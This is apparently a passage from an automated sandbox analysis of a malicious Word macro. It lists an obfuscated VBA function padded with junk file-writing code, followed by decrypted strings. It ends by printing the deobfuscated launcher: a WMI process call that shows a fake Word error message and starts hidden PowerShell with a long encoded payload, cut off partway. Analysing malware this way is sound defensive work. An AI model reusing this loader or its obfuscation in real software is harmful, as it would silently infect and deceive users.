                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            inIcjJtaF

                                            Close

                                            zBSWCKmJv

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Pg5minli2d3c9

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: sreXHFD

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: eCIzUDyJ

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Close

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: yJmmmVIAG

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Replace

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Ij2hesgjee57d3s0

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: uVItICICB

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: anyPG

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: Close

                                            Part of subcall function Hrs2a1p95u19@Owppnp8hah4xo788: YVZXECEHD

                                            KXTliE

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            YZllAeRe

                                            Close

                                            hjZwD

                                            FUyIHBDFz

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            AiRdGDAJ

                                            Close

                                            AioOpBFE

                                            StringsDecrypted Strings
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "OiBXGJB:\pnqsZEDV\gsZoAW.EePnB"
                                            "eEWdaDQVJJqTHgF"
                                            "OyFBLhlWUnD"
                                            "TBKmUCEXTUIGu"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "OBoYzRpef:\sDLuJ\bmIQSG.MdmDR"
                                            "NeiIGCNWgICn"
                                            "EgxfIDVQbJotWhj"
                                            "UjBKOEDRIbiWFB"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD"
                                            "RhnJRGeBNASBQHHGF"
                                            "WNFUDvHgghFdup"
                                            "eeVVJBMGlcfXMB"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC"
                                            "ptABFEZDmkMVIeD"
                                            "vVbvIHcFGEAJJ"
                                            "NisSEYrcDlKQUITa"
                                            LineInstructionMeta Information
                                            197

                                            Function Jlda77h_v8nx5(Wwsqkhmtfcf3_y)

                                            198

                                            On Error Resume Next

                                            executed
                                            199

                                            Goto PbhYVsA

                                            200

                                            Dim PcHRGIADo as Object

                                            201

                                            Set TXmxvp = SQQWY

                                            SQQWY

                                            SQQWY

                                            SQQWY

                                            SQQWY

                                            SQQWY

                                            202

                                            Set PcHRGIADo = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            CreateObject

                                            CreateObject

                                            CreateObject

                                            CreateObject

                                            203

                                            Dim PbhYVsA as Object

                                            204

                                            Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")

                                            CreateTextFile

                                            CreateTextFile

                                            CreateTextFile

                                            CreateTextFile

                                            CreateTextFile

                                            205

                                            PbhYVsA.WriteLine "eEWdaDQVJJqTHgF"

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            206

                                            PbhYVsA.WriteLine "OyFBLhlWUnD"

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            207

                                            PbhYVsA.WriteLine "TBKmUCEXTUIGu"

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            208

                                            Set qHKYGHlFA = ddanFDWJf

                                            ddanFDWJf

                                            ddanFDWJf

                                            ddanFDWJf

                                            ddanFDWJf

                                            ddanFDWJf

                                            209

                                            PbhYVsA.Close

                                            Close

                                            Close

                                            Close

                                            Close

                                            Close

                                            210

                                            Set PcHRGIADo = Nothing

                                            211

                                            Set sPkIwu = RhztCF

                                            RhztCF

                                            RhztCF

                                            RhztCF

                                            RhztCF

                                            RhztCF

                                            212

                                            Set PbhYVsA = Nothing

                                            212

                                            PbhYVsA:

                                            214

                                            Gqzsjl136wugk27i9 = Wwsqkhmtfcf3_y

                                            215

                                            Goto NuebA

                                            216

                                            Dim sTzDC as Object

                                            217

                                            Set GIAKA = kwzjKvZHe

                                            kwzjKvZHe

                                            kwzjKvZHe

                                            kwzjKvZHe

                                            kwzjKvZHe

                                            kwzjKvZHe

                                            218

                                            Set sTzDC = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            CreateObject

                                            CreateObject

                                            CreateObject

                                            CreateObject

                                            219

                                            Dim NuebA as Object

                                            220

                                            Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")

                                            CreateTextFile

                                            CreateTextFile

                                            CreateTextFile

                                            CreateTextFile

                                            CreateTextFile

                                            221

                                            NuebA.WriteLine "NeiIGCNWgICn"

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            222

                                            NuebA.WriteLine "EgxfIDVQbJotWhj"

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            223

                                            NuebA.WriteLine "UjBKOEDRIbiWFB"

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            224

                                            Set idbaDIr = inIcjJtaF

                                            inIcjJtaF

                                            inIcjJtaF

                                            inIcjJtaF

                                            inIcjJtaF

                                            inIcjJtaF

                                            225

                                            NuebA.Close

                                            Close

                                            Close

                                            Close

                                            Close

                                            Close

                                            226

                                            Set sTzDC = Nothing

                                            227

                                            Set KXwaABT = zBSWCKmJv

                                            zBSWCKmJv

                                            zBSWCKmJv

                                            zBSWCKmJv

                                            zBSWCKmJv

                                            zBSWCKmJv

                                            228

                                            Set NuebA = Nothing

                                            228

                                            NuebA:

                                            230

                                            Gnc9qzz9241pnhfi = Hrs2a1p95u19(Gqzsjl136wugk27i9)

                                            231

                                            Goto gxBPJB

                                            232

                                            Dim zxgLHJSFW as Object

                                            233

                                            Set quDoH = KXTliE

                                            KXTliE

                                            KXTliE

                                            KXTliE

                                            KXTliE

                                            KXTliE

                                            234

                                            Set zxgLHJSFW = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            CreateObject

                                            CreateObject

                                            CreateObject

                                            CreateObject

                                            235

                                            Dim gxBPJB as Object

                                            236

                                            Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")

                                            CreateTextFile

                                            CreateTextFile

                                            CreateTextFile

                                            CreateTextFile

                                            CreateTextFile

                                            237

                                            gxBPJB.WriteLine "RhnJRGeBNASBQHHGF"

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            238

                                            gxBPJB.WriteLine "WNFUDvHgghFdup"

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            239

                                            gxBPJB.WriteLine "eeVVJBMGlcfXMB"

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            240

                                            Set nleaHR = YZllAeRe

                                            YZllAeRe

                                            YZllAeRe

                                            YZllAeRe

                                            YZllAeRe

                                            YZllAeRe

                                            241

                                            gxBPJB.Close

                                            Close

                                            Close

                                            Close

                                            Close

                                            Close

                                            242

                                            Set zxgLHJSFW = Nothing

                                            243

                                            Set mgTNFCq = hjZwD

                                            hjZwD

                                            hjZwD

                                            hjZwD

                                            hjZwD

                                            hjZwD

                                            244

                                            Set gxBPJB = Nothing

                                            244

                                            gxBPJB:

                                            246

                                            Jlda77h_v8nx5 = Gnc9qzz9241pnhfi

                                            247

                                            Goto mgrwfmN

                                            248

                                            Dim RjiQHRA as Object

                                            249

                                            Set EhCMG = FUyIHBDFz

                                            FUyIHBDFz

                                            FUyIHBDFz

                                            FUyIHBDFz

                                            FUyIHBDFz

                                            FUyIHBDFz

                                            250

                                            Set RjiQHRA = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            CreateObject

                                            CreateObject

                                            CreateObject

                                            CreateObject

                                            251

                                            Dim mgrwfmN as Object

                                            252

                                            Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")

                                            CreateTextFile

                                            CreateTextFile

                                            CreateTextFile

                                            CreateTextFile

                                            CreateTextFile

                                            253

                                            mgrwfmN.WriteLine "ptABFEZDmkMVIeD"

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            254

                                            mgrwfmN.WriteLine "vVbvIHcFGEAJJ"

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            255

                                            mgrwfmN.WriteLine "NisSEYrcDlKQUITa"

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            256

                                            Set MNihxICY = AiRdGDAJ

                                            AiRdGDAJ

                                            AiRdGDAJ

                                            AiRdGDAJ

                                            AiRdGDAJ

                                            AiRdGDAJ

                                            257

                                            mgrwfmN.Close

                                            Close

                                            Close

                                            Close

                                            Close

                                            Close

                                            258

                                            Set RjiQHRA = Nothing

                                            259

                                            Set wTMSLyWFG = AioOpBFE

                                            AioOpBFE

                                            AioOpBFE

                                            AioOpBFE

                                            AioOpBFE

                                            AioOpBFE

                                            260

                                            Set mgrwfmN = Nothing

                                            260

                                            mgrwfmN:

                                            262

                                            End Function

                                            Function Hrs2a1p95u19, APIs: 93, Strings: 11, Number of lines: 34, Relevance: 216.034
                                            APIsMeta Information

                                            Pg5minli2d3c9

                                            sreXHFD

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            eCIzUDyJ

                                            Close

                                            yJmmmVIAG

                                            Replace

                                            		Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process Replace("]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAB]anw[3zAF]anw[3YAI]anw[3AAg]anw[3ACg]anw[3AIg]anw[3BLA]anw[3CIA]anw[3KwA]anw[3iAD]anw[3QAN]anw[3wBk]anw[3ACI]anw[3AKQ]anw[3AgA]anw[3CAA]anw[3KAB]anw[3bAH]anw[3QAW]anw[3QBQ]anw[3AGU]anw[3AXQ]anw[3AoA]anw[3CIA]anw[3ewA]anw[30AH]anw[30Ae]anw[3wAx]anw[3AH0]anw[3Aew]anw[3AwA]anw[3H0A]anw[3ewA]anw[3zAH]anw[30Ae]anw[3wAy]anw[3AH0]anw[3AIg]anw[3AtA]anw[3EYA]anw[3JwB]anw[3zAC]anw[3cAL]anw[3AAn]anw[3AHk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3jAF]anw[3QAb]anw[3wBy]anw[3AFk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3VAB]anw[3FAG]anw[30AL]anw[3gBJ]anw[3AG8]anw[3ALg]anw[3BEA]anw[3EkA]anw[3cgA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3ACc]anw[3AKQ]anw[3ApA]anw[3CAA]anw[3IAA]anw[37AC]anw[3AAI]anw[3AAg]anw[3ACA]anw[3AJA]anw[3BXA]anw[3GkA]anw[3OAA]anw[3gAD]anw[30AW]anw[3wB0]anw[3AHk]anw[3AUA]anw[3BlA]anw[3F0A]anw[3KAA]anw[3iAH]anw[3sAM]anw[3gB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3ANA]anw[3B9A]anw[3HsA]anw[3NgB]anw[39AH]anw[3sAN]anw[3QB9]anw[3AHs]anw[3AOA]anw[3B9A]anw[3HsA]anw[3MAB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BnA]anw[3EUA]anw[3UgA]anw[3nAC]anw[3wAJ]anw[3wAu]anw[3AE4]anw[3AZQ]anw[3B0A]anw[3C4A]anw[3UwB]anw[3FAF]anw[3IAV]anw[3gAn]anw[3ACw]anw[3AJw]anw[3BTA]anw[3FkA]anw[3cwA]anw[3nAC]anw[3wAJ]anw[3wBU]anw[3AGU]anw[3AJw]anw[3AsA]anw[3CcA]anw[3SQA]anw[3nAC]anw[3wAJ]anw[3wB0]anw[3AG0]anw[3AQQ]anw[3AnA]anw[3CwA]anw[3JwB]anw[3DAG]anw[3UAU]anw[3ABP]anw[3AEk]anw[3ATg]anw[3AnA]anw[3CwA]anw[3JwB]anw[3tAC]anw[3cAL]anw[3AAn]anw[3AE4]anw[3AYQ]anw[3AnA]anw[3CkA]anw[3IAA]anw[37AC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3AGk]anw[3AbA]anw[3BlA]anw[3G4A]anw[3dAA]anw[3nAC]anw[3sAJ]anw[3wBs]anw[3AHk]anw[3AJw]anw[3ApA]anw[3CsA]anw[3JwB]anw[3DAC]anw[3cAK]anw[3wAo]anw[3ACc]anw[3Abw]anw[3BuA]anw[3CcA]anw[3KwA]anw[3nAH]anw[3QAa]anw[3QAn]anw[3ACk]anw[3AKw]anw[3AnA]anw[3G4A]anw[3JwA]anw[3rAC]anw[3cAd]anw[3QBl]anw[3ACc]anw[3AKQ]anw[3A7A]anw[3CQA]anw[3TwB]anw[3sAD]anw[3kAb]anw[3wBu]anw[3AGs]anw[3AaQ]anw[3A9A]anw[3CQA]anw[3QwA]anw[3wAD]anw[3IAV]anw[3wAg]anw[3ACs]anw[3AIA]anw[3BbA]anw[3GMA]anw[3aAB]anw[3hAH]anw[3IAX]anw[3QAo]anw[3ADY]anw[3ANA]anw[3ApA]anw[3CAA]anw[3KwA]anw[3gAC]anw[3QAQ]anw[3QAw]anw[3ADM]anw[3AUA]anw[3A7A]anw[3CQA]anw[3SAA]anw[3yAD]anw[3cAW]anw[3AA9]anw[3ACg]anw[3AJw]anw[3BJA]anw[3CcA]anw[3KwA]anw[3oAC]anw[3cAN]anw[3gAn]anw[3ACs]anw[3AJw]anw[3A3A]anw[3FEA]anw[3JwA]anw[3pAC]anw[3kAO]anw[3wAg]anw[3ACA]anw[3AKA]anw[3BnA]anw[3GkA]anw[3IAA]anw[3oAC]anw[3IAV]anw[3gBh]anw[3AFI]anw[3AIg]anw[3ArA]anw[3CIA]anw[3aQB]anw[3BAE]anw[3IAT]anw[3ABl]anw[3ADo]anw[3Aaw]anw[3AiA]anw[3CsA]anw[3IgA]anw[30AD]anw[3cAZ]anw[3AAi]anw[3ACk]anw[3AIA]anw[3AgA]anw[3CkA]anw[3LgB]anw[32AG]anw[3EAT]anw[3AB1]anw[3AGU]anw[3AOg]anw[3A6A]anw[3CIA]anw[3QwB]anw[3yAE]anw[3UAY]anw[3ABB]anw[3AGA]anw[3AVA]anw[3BgA]anw[3EUA]anw[3RAB]anw[3JAF]anw[3IAZ]anw[3QBD]anw[3AFQ]anw[3AYA]anw[3BPA]anw[3FIA]anw[3eQA]anw[3iAC]anw[3gAJ]anw[3ABI]anw[3AE8]anw[3ATQ]anw[3BFA]anw[3CAA]anw[3KwA]anw[3gAC],"]anw[3",) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 